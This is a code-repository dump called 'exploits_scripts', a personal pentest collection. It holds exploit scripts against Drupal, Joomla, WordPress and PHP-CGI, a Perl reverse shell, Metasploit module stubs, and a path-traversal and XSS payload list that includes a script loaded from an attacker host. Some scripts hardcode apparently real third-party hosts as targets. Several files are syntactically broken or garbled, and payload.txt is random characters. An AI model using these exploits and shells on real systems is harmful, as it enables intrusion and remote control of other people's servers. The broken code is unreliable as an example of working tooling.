├── CVE-2006-20001.py
├── CVE-2008-0005.html
├── CVE-2018-7600.pl
├── README.md
├── WordPress_RCE.php
├── adr_shell.sh
├── azure_tamper.py
├── binary_expl.py
├── blind_rop.sh
├── bof_fuzzer.py
├── brop
├── buff_build.py
├── buffer_layout.sh
├── buffer_len.py
├── buffer_scan
├── cgi_cmd_exec.rb
├── code_exec1.rb
├── code_exec2.rb
├── cookie_rce.pl
├── cve_1.py
├── drupal_exec.sh
├── drupal_rce.pl
├── execve_code.c
├── exploit_mod_session.c
├── fastcgi_rce.py
├── fs.sh
├── joomla_rce.pl
├── kitty_fuzz.py
├── mini_ecex.py
├── msrpc_fuzz.c
├── payload.txt
├── payloads_sample.txt
├── pwner.py
├── r2pipe.py
├── rce_proxy.py
├── rce_ssh.cpp
├── redirect_wp_shell.pl
├── ret.rs
├── ret2lib.sh
├── ret_pwn.py
├── return_sqli.pl
├── rop_exp.rs
├── ropchain.py
├── segfault_fuzzer.c
├── server_fuzz.rs
├── shell_exec.c
├── shell_scan.rs
├── smb_rce.py
├── ssh_exploit.c
├── strcpy_r2.py
├── syscall.sh
├── tamper_aws.py
├── tamper_payloads.txt
├── tamper_unix.py
├── trun_fuzzer.py
├── webdav_exec.pl
├── webfuzzer.rs
├── webmin_rce.pl
└── zyxel_rce.py
/CVE-2006-20001.py:
--------------------------------------------------------------------------------
1 | import socket
2 |
3 | target_host = "195.4.223.84"
4 | target_port = 80
5 |
6 | client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
7 |
8 | client.connect((target_host, target_port))
9 |
10 | request = "GET / HTTP/1.1\r\nIf: \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n\r\n"
11 |
--------------------------------------------------------------------------------
/CVE-2008-0005.html:
--------------------------------------------------------------------------------
1 |
6 |
--------------------------------------------------------------------------------
/CVE-2018-7600.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 |
3 | use LWP::UserAgent;
4 |
5 | $ua = LWP::UserAgent->new;
6 | $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13");
7 |
8 | $target = $ARGV[0];
9 | $drupal_path = $ARGV[1];
10 |
11 | if(!$target || !$drupal_path) {
12 | print "Usage: perl $0 \n";
13 | print "Example: perl $0 www.example.com /drupal\n";
14 | exit;
15 | }
16 |
17 | $exploit = $target . $drupal_path . "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax";
18 |
19 | $post_data = "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=" . urlencode("echo \"VULNERABLE\" > /tmp/vulnerable.txt");
20 |
21 | $response = $ua->post($exploit, Content_Type => 'application/x-www-form-urlencoded', Content => $post_data);
22 | if($response->is_success) {
23 | print "Exploit successful!\n";
24 | print "Check /tmp/vulnerable.txt\n";
25 | }
26 | else {
27 | print "Exploit failed.\n";
28 | }
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # exploits_scripts
2 | my mini collection of exploits and scripts for pentest
3 |
--------------------------------------------------------------------------------
/WordPress_RCE.php:
--------------------------------------------------------------------------------
1 | 'revslider_ajax_action',
6 | 'client_action' => 'update_plugin',
7 | 'update_file' => "@shell.php" ); // The shell file we want to upload
8 |
9 | $ch = curl_init(); // Initialize a cURL session
10 |
11 | curl_setopt($ch, CURLOPT_URL,$url); // Set the target URL to send our request to
12 | curl_setopt($ch, CURLOPT_POST, 1); // Set the request type as POST (Default value) curl_setopt($ch, CURLOPT__POSTFIELDS,$data); // Set our data array as the POST data
13 |
14 | $result=curl_exec ($ch); // Execute the cURL session and store its response in a variable
15 |
16 | echo $result; // Print out the response from our cURL session which should be a success message if everything went alright!
17 |
--------------------------------------------------------------------------------
/adr_shell.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 |
3 | target_binary="$1"
4 | system_addr=$(objdump -d "$target_binary" | \
5 | grep -E 'call.*' | \
6 | head -1 | \
7 | awk '{print $1}' | \
8 | sed -e 's/^.*/' -e 's/>$//')
9 | shell_addr=$(objdump -s "$target_binary" | \
10 | grep -E '/bin/sh' | \
11 | awk '{print $3}')
12 | echo "System address: $system_addr"
13 | echo "Shell address: $shell_addr"
14 |
--------------------------------------------------------------------------------
/azure_tamper.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | import re
4 |
5 | def tamper(payload, **kwargs):
6 | payload = re.sub(r"(?<=\w)\s*=\s*", "=;", payload)
7 | return payload
8 |
--------------------------------------------------------------------------------
/binary_expl.py:
--------------------------------------------------------------------------------
1 | import angr
2 | import pwntools
3 |
4 | proj = angr.Project('target_binary', auto_load_libs=False)
5 | state = proj.factory.blank_state(addr=proj.entry)
6 | sm = proj.factory.simgr(state)
7 | sm.explore(find=lambda s: b"\x90\x90\x90\x90" in s.posix.dumps(1))
8 | return_addr = sm.found[0].posix.dumps(1)[-8:]
9 | shellcode = pwntools.shellcraft.amd64.linux.sh()
10 | payload = b"A" * (len(return_addr) - len(shellcode)) + shellcode
11 | exploit = pwntools.core.PwnlibContextType.shellcraft.pushstr(payload)
12 | p = proj.surveyors.ExploitSurveyor(find=[return_addr], use_bytes=True, shellcode=exploit)
13 | p.run()
--------------------------------------------------------------------------------
/blind_rop.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Blind ROP Exploitation Script
4 | # Find buffer overflow offset
5 | target_binary="$1"
6 | echo "Finding buffer overflow offset..."
7 | python2 -c 'print "A"*offset' | $target_binary
8 | # Find canary
9 | echo "Finding canary..."
10 | python2 -c 'print "A"*offset + "\x00"*8' | $target_binary
11 | # Find saved registers (RBP / RIP)
12 | echo "Finding saved registers (RBP / RIP)..."
13 | python2 -c 'print "A"*offset + "\x00"*8 + "\x01\x02\x03\x04\x05\x06\x07\x08"' | $target_binary
14 | # Find stop gadgets
15 | echo "Finding stop gadgets..."
16 | ROPgadget --binary $target_binary --ropchain --badbytes 0 > gadgets.txt
17 | grep -E 'ret|pop|leave|retf' gadgets.txt > stop_gadgets.txt # grep for ret, pop, leave and retf instructions in the gadget list to find stop gadgets # save the results in a separate file for later use.
18 | # Find brop gadgets
19 | echo "Finding brop gadgets..." # search for ropchain instructions in the gadget list to find brop gadgets # save the results in a separate file for later use.
20 | ROPgadget --binary $target_binary --ropchain > brop_gadgets.txt
21 | # Find a Write function (write / dprintf / puts / ...)
22 | echo "Finding a Write function (write / dprintf / puts / ...)..."
23 | strings $target_binary| grep -E 'write|dprintf|puts' > write_functions.txt # search for write, dprintf and puts functions in the binary and save them to a file for later use.
24 | # Leak the binary for target binaryes and servers
25 | echo "Leaking the binary for target binaryes and servers..."
26 | nc 127.0.0.1 80 < <(cat $target_binary)
27 |
--------------------------------------------------------------------------------
/bof_fuzzer.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import pwntools pwn
3 | from pwn import *
4 |
5 | target_host = "example.com"
6 | target_port = 80
7 |
8 | conn = pwntools.remote(target_host, target_port)
9 |
10 | payload_size = 100
11 |
12 | while True:
13 | payload = 'A' * payload_size
14 | conn.send(payload)
15 |
16 | print("Sent %d bytes" % len(payload))
17 |
--------------------------------------------------------------------------------
/brop:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TcherB31/exploits_scripts/5fae4e405107b2bf8570368b80e09590d3d25cb0/brop
--------------------------------------------------------------------------------
/buff_build.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import os
3 |
4 | # Get the target file
5 | target_file = sys.argv[1]
6 |
7 | # Create the exploit
8 | exploit = ""
9 | exploit += "#!/usr/bin/perl\n"
10 | exploit += "use strict;\n"
11 | exploit += "use warnings;\n"
12 | exploit += "\n"
13 | exploit += "# Exploit code goes here\n"
14 | exploit += "my $buffer = \"A\" x 1024;\n"
15 | exploit += "my $eip = \"\\x90\\x90\\x90\\x90\";\n"
16 | exploit += "my $shellcode = \"\\x90\" x 32;\n"
17 | exploit += "\n"
18 | exploit += "open(my $file, '>', $ARGV[0]) or die \"Could not open file '$ARGV[0]' $!\";\n"
19 | exploit += "print $file $buffer.$eip.$shellcode;\n"
20 | exploit += "close $file;\n"
21 |
22 | # Write the exploit to a file
23 | with open("exploit.pl")
--------------------------------------------------------------------------------
/buffer_layout.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | PATH=/usr/bin:/usr/sbin:/bin:/sbin
4 | if [ $# -eq 0 ]; then
5 | echo "No target binary specified. Exiting..."
6 | exit 1
7 | fi
8 | target_binary="$1"
9 | if [ ! -f "$target_binary" ]; then
10 | echo "Target binary does not exist. Exiting..."
11 | exit 1
12 | fi
13 |
14 | readelf -l "$target_binary" > /tmp/readelf_program_headers.txt
15 |
16 | start_heap=$(cat /tmp/readelf_program_headers.txt | grep HEAP | awk '{print $2}')
17 | end_heap=$(cat /tmp/readelf_program_headers.txt | grep HEAP | awk '{print $3}')
18 |
19 | objdump -d "$target_binary" > /tmp/objdump_assembly.txt
20 |
21 | malloc_refs=$(cat /tmp/objdump_assembly.txt | grep -E 'malloc|calloc|realloc|free')
22 | echo "References to memory allocation functions:"
23 | echo "$malloc_refs"
24 | echo ""
25 |
26 | echo "Analyzing assembly code to determine how the heap is structured..."
27 | echo ""
28 |
29 | echo "Heap region starts at: $start_heap"
30 | echo "Heap region ends at: $end_heap"
31 | echo ""
32 |
33 | echo "Analyzing assembly code to determine how memory is allocated and freed in the heap..."
34 | echo ""
35 |
36 | echo "Identifying any memory management techniques that are used to manage the heap..."
37 | echo ""
38 |
39 | echo "Identifying any security measures that are used to protect the heap from malicious access..."
40 | echo ""
41 |
42 | echo "Analyzing assembly code to determine any potential vulnerabilities in the heap layout..."
43 | echo ""
44 |
45 | echo "Documenting findings and recommendations for improving the security of the heap layout..."
46 | echo ""
--------------------------------------------------------------------------------
/buffer_len.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | target = sys.argv[1]
4 |
5 | for i in range(1, 256):
6 | try:
7 | buffer = "A" * i
8 | payload = buffer + target
9 | print("[+] Trying buffer length: %d" % i)
10 | response = subprocess.check_output(payload, shell=True)
11 | except:
12 | print("[+] Buffer length found: %d" % i)
13 | break
14 |
--------------------------------------------------------------------------------
/buffer_scan:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TcherB31/exploits_scripts/5fae4e405107b2bf8570368b80e09590d3d25cb0/buffer_scan
--------------------------------------------------------------------------------
/cgi_cmd_exec.rb:
--------------------------------------------------------------------------------
1 | # #
2 | # This module requires Metasploit: https: //metasploit.com/download
3 | # Current source: https: //github.com/rapid7/metasploit-framework
4 | # #
5 |
6 | require 'msf/core'
7 |
8 | class MetasploitModule < Msf::Exploit::Remote
9 | Rank = ExcellentRanking
10 | include Msf::Exploit::Remote::HttpClient
11 |
12 | def initialize(info = {})
13 | super(update_info(info,
14 | 'Name' => 'Ruby for Metasploit Framework Remote Code Execution Vulnerability in /cgi-bin/cmd.cgi',
15 | 'Description' => % q { This module exploits a remote code execution vulnerability in the /cgi-bin/cmd.cgi script on Ruby for Metasploit Framework systems
16 | },
17 | 'Author' => ['TcherBer'], # an author or list of authors 'Payload' => {}, # payload info # target 's architecture that will receive the payload
18 | 'Platform' => ['unix', 'linux', ], # platform info(Unix, Linux, etc.)
19 | 'Targets' => [
20 | ["Automatic", {}]
21 | ], # targets info(OS version, etc.) # an array of service versions that are vulnerable
22 | }, # an array of references to related security advisories], # a hash of verification information(e.g.file checksum)), # vulnerability disclosure date), # exploit publish date))
23 | super(update_info(info, )) end def check vprint_status("Checking target") res = send_request_cgi({
24 | "uri" => "/cgi-bin/cmd.cgi",
25 | }) if res && res.code == 200 && res.body = ~/Command Executor/
26 | return Exploit::CheckCode::Vulnerable
27 | else return Exploit::CheckCode::Safe end end def exploit print_status("Sending payload...") send_request_raw({
28 | "method" => "POST",
29 | "uri" => "/cgi-bin/cmd.cgi",
30 | "data" => payload
31 | }) end end
32 |
--------------------------------------------------------------------------------
/code_exec1.rb:
--------------------------------------------------------------------------------
1 | #!/usr/bin/ruby
2 |
3 | require 'msf/core'
4 |
5 | class MetasploitModule < Msf::Exploit::Remote
6 |
7 | Rank = ExcellentRanking
8 |
9 | include Msf::Exploit::Remote::HttpClient
10 |
11 | def initialize(info = {})
12 | super(update_info(info,
13 | 'Name' => 'Bash Command Execution in Target URLs',
14 | 'Description' => % q {
15 | This module exploits a vulnerability in websites that contain vulnerable parameters and functions.It allows an attacker to execute arbitrary bash commands on the target system.
16 | },
17 | 'License' => MSF_LICENSE,
18 | 'Author' => ['Your Name '],
19 | ['URL', 'http://example.com']
20 | ],
21 | 'Space' => 1024,
22 | if true(
23 | default)
24 | },
25 |
26 |
27 | 'Targets' => [
28 | ["Automatic", {}]
29 | ],
30 |
31 |
32 | ))
33 |
34 | register_options([OptString.new('TARGETURI', [true, "The base path to the web application", "/"])])
35 |
36 | deregister_options('VHOST')
37 |
38 | end
39 |
40 | def check
41 | for vulnerability goes here(e.g., version detection)
42 |
43 | end
44 |
45 | def exploit
46 |
47 | endend
--------------------------------------------------------------------------------
/code_exec2.rb:
--------------------------------------------------------------------------------
1 | #!/usr/bin /ruby
2 |
3 | require 'msf/core'
4 |
5 | class MetasploitModule < Msf::Exploit::Remote
6 | include Msf::Exploit::Remote::HttpClient
7 |
8 | def initialize(info = {})
9 | super(update_info(info,
10 | 'Name' => 'Command Injection Module',
11 | 'Description' => % q {
12 | This module exploits a Command injection vulnerability in websites that contain
13 | vulnerable parameters in the URL.
14 | },
15 | 'Author' => ['Your Name'],
16 | 'License' => MSF_LICENSE,
17 | 'References' => [
18 | ['URL', 'https://example.com/'],
19 | ],
20 | 'Privileged' => false,
21 | 'Platform' => ['unix', 'linux'],
22 | 'Arch' => [ARCH_X86, ARCH_X64],
23 | 'Payload' => {
24 | 'BadChars' => "\x00"
25 | },
26 | 'Targets' => [
27 | ['Generic (Unix In-Memory)',
28 | 'Platform' => 'unix',
29 | 'Arch' => ARCH_CMD,
30 | ],
31 | ],
32 | 'DefaultTarget' => 0
33 | ))
34 |
35 | register_options(
36 | [
37 | OptString.new('TARGETURI', [true, 'The target URI of the vulnerable PHP application', '/path/to/target/param']),
38 | OptString.new('USER', [true, 'The username'])
39 | ], self.class)
40 | end
41 |
42 | def check
43 | res = nil
44 | req = send_request_cgi({
45 | 'method' => 'GET',
46 | 'uri' => normalize_uri(target_uri.path)
47 | })
48 |
49 | failure
50 | end
51 |
52 | def exploit
53 | command = "/bin/bash -c \"#{payload.encoded}\""
54 |
55 | begin
56 | res = send_request_cgi({
57 | 'method' => 'GET',
58 | 'uri' => normalize_uri(target_uri.path) + "?command=#{command}",
59 | 'vars_get' => {
60 | 'username' => datastore['USER'],
61 | }
62 | })
63 | end
64 |
65 | if res and res.code == 200 and res.body.include ? ('Command executed successfully')
66 | print_status("Exploit successful")
67 | else
68 | fail_with(Failure::Unknown, "Exploit Failed")
69 | end
70 | end
71 | end
--------------------------------------------------------------------------------
/cookie_rce.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 |
3 | use LWP::UserAgent;
4 | my $url = "http://www.example.com/";
5 | my $command = "; ls -la;";
6 | my $ua = LWP::UserAgent->new;
7 | $ua->default_header('Cookie' => "command=$command");
8 | my $response = $ua->get($url);
9 | print $response->content;
10 |
--------------------------------------------------------------------------------
/cve_1.py:
--------------------------------------------------------------------------------
1 | import socket
2 |
3 | target_host = "ebmconsulting.com.hk"
4 | target_port = 80
5 |
6 | # Create a socket object
7 | client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
8 |
9 | # Connect to the target
10 | client.connect((target_host, target_port))
11 |
12 | # Send malicious request
13 | evil_request = "GET / HTTP/1.1\r\nHost: ebmconsulting.com.hk\r\nCookie: SESSIONID=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  
--------------------------------------------------------------------------------
/drupal_exec.sh:
--------------------------------------------------------------------------------
1 | perl -e 'use Socket;$i="TARGET_IP";$p=PORT;socket(S,PFINET,SOCKSTREAM,getprotobyname("tcp"));if(connect(S,sockaddrin($p,inetaton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
2 |
--------------------------------------------------------------------------------
/drupal_rce.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 |
3 | use LWP::UserAgent;
4 |
5 | $target = "http://target.com/admin";
6 | $payload = "?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=id";
7 |
8 | $ua = LWP::UserAgent->new;
9 | $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
10 |
11 | $response = $ua->get($target.$payload);
12 |
13 | if ($response->is_success) {
14 | print $response->decoded_content;
15 | } else {
16 | print $response->status_line;
17 | }
18 |
--------------------------------------------------------------------------------
/execve_code.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | int main(int argc, char *argv[])
6 | {
7 | char *args[] = {"/bin/sh", "-c", "id", NULL};
8 | execve(args[0], args, NULL);
9 | return 0;
10 | }
11 |
--------------------------------------------------------------------------------
/exploit_mod_session.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 |
8 | int main(int argc, char * argv[]) {
9 | int sockfd;
10 | struct sockaddr_in server_addr;
11 |
12 | if (argc != 3) {
13 | printf("Usage: %s [IP] [PORT]\n", argv[0]);
14 | exit(1);
15 | }
16 | // Create socket and connect to server
17 | sockfd = socket(AF_INET, SOCK_STREAM, 0);
18 | memset( & server_addr, 0, sizeof(server_addr));
19 | server_addr.sin_family = AF_INET;
20 | server_addr.sin_port = htons(atoi(argv[2]));
21 | inet_pton(AF_INET, argv[1], & server_addr.sin_addr);
22 | connect(sockfd, (struct sockaddr * ) & server_addr, sizeof(server_addr));
23 | char request[] = "GET / HTTP/1.1\r\nHost: localhost\r\nCookie: SESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nConnection: close\r\nContent-Length: 0\r\n\r\n";
24 | send(sockfd, request, strlen(request), 0);
25 | close(sockfd);
26 | return 0;
27 | }
--------------------------------------------------------------------------------
/fastcgi_rce.py:
--------------------------------------------------------------------------------
1 | import requests
2 |
3 | target = "http://localhost:8088/cgi-bin/webui/admin/tools/app_ping/diag_ping/"
4 | headers = {
5 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
6 | }
7 | payload = "?-d+allow_url_include=on+-d+auto_prepend_file=php://input"
8 | data = ""
9 | url = target + payload
10 | r = requests.post(url, data=data, headers=headers)
11 | if r.status_code == 200:
12 | print("Successfully Exec Command")
13 |
--------------------------------------------------------------------------------
/fs.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | binary="/usr/bin/grep"
3 | vulninput="%x.%x.%x.%x.%x.%x"
4 |
5 | gdb -q $binary << EOF
6 | run <<< "$vulninput"
7 | EOF
8 |
--------------------------------------------------------------------------------
/joomla_rce.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 |
3 | use LWP::UserAgent;
4 |
5 | my $target = "http://www.example.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload";
6 |
7 | my $ua = LWP::UserAgent->new;
8 | $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)");
9 |
10 | my $exploit = $target . "&file[0]=shell.php&file[1]=''";
11 |
12 | my $response = $ua->get($exploit);
13 | if ($response->is_success){
14 | print "Exploit sent successfully\n";
15 | }
16 | else {
17 | print "Exploit failed\n";
18 | }
--------------------------------------------------------------------------------
/kitty_fuzz.py:
--------------------------------------------------------------------------------
1 | from kitty.model import *
2 | from kitty.interfaces.web import WebInterface
3 |
4 | sess = Session(
5 | web_interface=WebInterface(host='127.0.0.1', port=8080),
6 | fuzz_data_collector=DataCollector()
7 | )
8 |
9 | target = Target(name='Fuzzing Target', process='httpd', session=sess)
10 | model = BufferOverflow(name='Buffer Overflow', target=target, size=1024)
11 |
12 | sess.connect(sess.web_interface)
13 | sess.fuzz(model)
--------------------------------------------------------------------------------
/mini_ecex.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | target_host = "127.0.0.1"
4 | cmd = "ping -c 4 " + target_host
5 | os.system(cmd)
6 |
--------------------------------------------------------------------------------
/msrpc_fuzz.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 |
8 | int main(int argc, char *argv[]) {
9 |
10 | int sockfd;
11 | struct sockaddr_in target;
12 |
13 | if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
14 | perror("socket");
15 | exit(1);
16 | }
17 |
18 | memset(&target, 0, sizeof(target));
19 | target.sin_family = AF_INET;
20 | if (inet_aton(argv[1], &target.sin_addr) == 0) {
21 | perror("inet_aton");
22 | exit(1);
23 | }
24 |
25 | target.sin_port = htons(135);
26 | if (connect(sockfd, (struct sockaddr *)&target, sizeof(target)) == -1) {
27 | perror("connect");
28 | exit(1);
29 |
30 | }
31 |
32 | printf("Connected to %s\n", inet_ntoa(target.sin_addr));
33 | char buf[1024];
34 | memset(&buf, 'A', 1024);
35 | send(sockfd, buf, 1024, 0);
36 | close(sockfd);
37 | return 0;
38 | }
--------------------------------------------------------------------------------
/payload.txt:
--------------------------------------------------------------------------------
1 | /%# (#/ #, ( , % , %%&/(&% /%,~~(..,,,,,,./.(/(/(..................................//.../.....)))))))))))))))/......))))).))))###///////////////:::::-...//++++++++////")),,,,,,,,,,,,,,,,,,,,-.-..-.%%%%%%%%%%HJKLKLIKHHIOOOOOOOOFFFFEEEE$.%%%%%%%%%%%%%%HHHHHHHHHKKJJKKLKSSSOOOOOORRRRQQQQQQWWWXXXXLLLLLLInnnnniiiiiyooooooooFFFf3DCACCDDDpmwlammlOOOMM@@@@UUVVVVXXZZzzxZXZZBBBB@TTTTTTT@@WJJAASSjjSAASsASswwwwXXXrrrrrfffFFFGGGGgggGIIIIAAzzZYYY###############$$$UUUUTTTT>>><<<>>><<<>>>>iilllLLLLfffff$$$$ppPPPP;;;;;;;66877766666666666666666666666666666666666666666666666666666665444444444444445555555555666PPPPP\\\\\\\\\\](()^^^^^^^^^))2222222244444444333333333333344555555999999988888999999uuuuuuuuuuuuuuuuu[[[[[[EEEEEEE00000AAAAAAAAaanndndndnndnnnnccccccxxxxxxxoooobbbbb%%PPPXXXXXYZTTTTaaaaabbbvvkkkeeeeettrrr???????????????………………………………………………………………………………………………………..................–––––―—–—¯¯¯¯.--.—.-.–.--.—.--.–.--.–…-.————®©¥§¶¥©€™•¡¬😊¢@£{}"😊£tØâßßߨû„‰Â^êÉ Fo¨–—| |طظΩ∆Σƒ∂đΠœäçñ\ıō•?'îøùóôœúœæðéáüôåï)*㉔=>°º╲●○◆❃ ◈ ⁂ 🐰 🐋 🎎 ♠️ ♣️ ♥️ ❤️ ❀ ⚑ ☼𝕊𝕖𝕧𝕖𝕟 •♪♫♬🌏☁️⛅️🍃 ©´❤️☀️✈️〰️▓█░▐░███████░░███░░▐░▌ ░י■𐌀𐌗𐌏𐌔𐌉𐌗u})})[[]:hiuhvucoueufue8732456789987655633333ggghhhhhhhhhhhhhhhhhhhjjjfjjgdfhjklsdkflskdjfkljsdlfksedlisolskldksodfloieidjonpwoecdizeissoonweiwewoi;2kka;kquapiq2wiq5wr46er48erpeifncodneiwme0e9lslpiscokpdkeiledkenomdxcpodcipcd
2 |
--------------------------------------------------------------------------------
/payloads_sample.txt:
--------------------------------------------------------------------------------
1 | ../../../../etc/passwd
2 | ../../../../etc/shadow
3 | ../../../../etc/hosts
4 | ../../../../*.conf
5 | ../../../*.conf
6 | ../../*.conf
7 | ./*.conf
8 | /var/log/*.*
9 | /var/logs/*.*
10 | /var/www/*.*
11 | /var/www/**/*.*
12 | /usr/local/**/*.*
13 | /usr/.htaccess
14 | /usr/.htpasswd
15 | /usr/.htgroup
16 | /*~*~*~*~*~*~*/**
17 | /*~*~*~*/**
18 | /*~*/**
19 | /*~~*/**
20 | /*~~*/**/**
21 | %0A
22 | %00
23 | //etc//passwd
24 | //etc//shadow
25 | //etc//hosts
26 | //bin//sh
27 | //bin//bash
28 | %00*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*
29 | ../../../../etc/passwd
30 | ../../../../etc/shadow
31 | ../../../../boot.ini
32 | ../../../windows/win.ini
33 | ../../../windows/system32/cmd.exe
34 | ../../../*.*
35 | %2Fetc%2Fpasswd
36 | %2Fetc%2Fshadow
37 | %25%30%41
38 | %252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
39 | %252e%252e%252f%252e%252e%252fetc/shadow
40 | /cgi-bin/test-cgi
41 | /cgi-bin/id
42 | /cgi-bin/*
43 | /cgi-bin/*.*
44 | /cgi-bin/*?*
45 | /cgi-bin/*&*
46 | /cgi-bin/*=*
47 | /*~*
48 | /*$*
49 | /*!*
50 | /*#*
51 | /cgi-bin/
52 | /phpmyadmin/
53 | /admin/
54 | /login/
55 | /config/
56 | /mysql/
57 | /wp-admin/
58 | /webdav/
59 | /server-status/
60 | /scripts/
61 | /*~1*/.asp
62 | /*~1*/.aspx
63 | /*~1*/.cfm
64 | /*~1*/.cgi
65 | /*~1*/.pl
66 | /*~1*/admin.*
67 | /*~1*/login.*
68 | /*~1*/logon.*
69 | /*~1*/manager.*
70 | /*~1*/secret.*
71 | /cgi-sys/
72 | /cgi-exe/
73 | /cgi-perl/
74 | /cgi-shl/
75 | /scripts/
76 | /scripts/admin/
77 | /scripts/root/
78 | /scripts/user/
79 | /*~root/*~user/*~admin/*~bin/*~sys/*~perl/*~shl*
80 | /*.*.*.*.*.*.*.*
81 | /*..*..*..*..*..*
82 | /*...*...*...*...*
83 | /*....*....*....*
84 | /*.....*/.....*/
85 | /*......*/......*/
86 | /*.......*/.......*/
87 | %2e%2e%2f%2e%2e%2f
88 | %252e%252e%252f%252e%252e%252f
89 | %c0%ae%c0%ae%c0%af
90 | ..%2f..%2f..%2f..%2fetc%2fpasswd
91 | ..%2f..%2f..%2f..%2fetc%2fshadow
92 | ..%252F..%252F..%252F..%252Fetc%252Fpasswd
93 | ..//../../../etc/passwd
94 | /cgi-bin/*?*=*&*=*&*=*&*=*&*=*&*=*&*=*&**/*?**/*?**/*?**/*?**/*?**/*?**/*?**/*?**/*?**/*?**/*?**/*?
95 | /cgi-bin/php
96 | /cgi-bin/php5
97 | /cgi-bin/perl
98 | /cgi-bin/python
99 | /cgi-bin/bash
100 | /cgi-bin/sh
101 | /cgi-bin/cmd
102 | /scripts/*.*
103 | /*~*.*
104 | /*~*
105 | /*.*~*
106 | /*.*~
107 | /*.*/*
108 | /*.*/*~*
109 | /*.*/*~
110 | */*.*/*
111 | */*.*/*~*
112 | */*.*/*~
113 | *;*/;*/;*/;*/;*/;*/;*/;*/;*/;*/;*
114 | /proc/self/environ
115 | %0a%0d%0a%0d%0a
116 | %25%30%41%25%30%44%25%30%41%25%30%44
117 | %3Cscript+src=http://attacker_site/evil_script.js+type=text/javascript+language=javascript+charset=utf-8+defer>
118 | %3Csvg+onload=alert(document.domain)>
119 |